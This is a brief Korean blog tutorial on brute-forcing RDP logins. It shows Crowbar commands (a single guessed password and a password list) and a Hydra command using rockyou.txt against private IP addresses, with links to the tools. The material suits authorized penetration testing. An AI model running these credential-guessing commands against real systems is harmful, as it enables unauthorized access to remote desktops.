네트워크 해킹 - rdp 사전 공격

728x90

재택근무가 잦아진 요즘 RDP(Remote Desktop Protocol)를 사용하는 유저들이 꽤나 많아졌다.

이런 시대의 흐름을 맞춰서 RDP를 공격하는 다양한 공격 도구들이 생겨났는데, 그중 하나가 사전 공격을 도와주는 Crowbar가 있다.

도구를 사용하기 이전에 리눅스에 freerdp가 설치되어있어야 함

sudo apt-get install -y nmap openvpn freerdp-x11 vncviewer

[사용 명령어]

./crowbar.py -b rdp -s 192.168.2.182/32 -u admin -c Aa123456

./crowbar.py -b rdp -s 192.168.2.250/32 -u localuser -C ~/Desktop/passlist

hydra로도 가능하다.

[사용 명령어]

hydra -t 1 -V -f -l administrator -P rockyou.txt rdp://192.168.1.1

crowbar 깃허브:

https://github.com/galkan/crowbar

GitHub - galkan/crowbar: Crowbar is brute forcing tool that can be used during penetration tests. It is developed to support pro

Crowbar is brute forcing tool that can be used during penetration tests. It is developed to support protocols that are not currently supported by thc-hydra and other popular brute forcing tools. -...

github.com

참고:

https://www.pwndefend.com/2018/07/24/hail-hydra-rdp-brute-forcing-with-hydra/

Hail Hydra – RDP brute forcing with HYDRA – PwnDefend

Securing services requires a broad range of knowledge of operating systems, networking, protocols and offensive capabilities. So I thought I would demonstrate some testing methods to show how a control is effective in blocking certain types of attack, so h

www.pwndefend.com

참고 영상:

https://www.youtube.com/watch?v=ql7opGQ3czE&ab_channel=LoiLiangYang

728x90

'🔒정보보안 > 네트워크 보안' 카테고리의 다른 글

리눅스 - ssh 연결시 tor socks5 경유하기 (0)	2022.08.01
네트워크 해킹 - ettercap의 arp 스푸핑을 이용해 dns 스푸핑하기 (0)	2021.12.22
네트워크 해킹 - Tor ProxyChains 로컬 프록시 설정 (0)	2021.12.15
네트워크 해킹 - medua, 무차별 대입 공격 도구 (0)	2021.11.22
네트워크 해킹 - hydra, 무차별 대입 공격 도구 (0)	2021.11.22

HackLog

네트워크 해킹 - rdp 사전 공격

'🔒정보보안 > 네트워크 보안' 카테고리의 다른 글

티스토리툴바

네트워크 해킹 - rdp 사전 공격

'🔒정보보안 > 네트워크 보안' 카테고리의 다른 글

관련글

티스토리툴바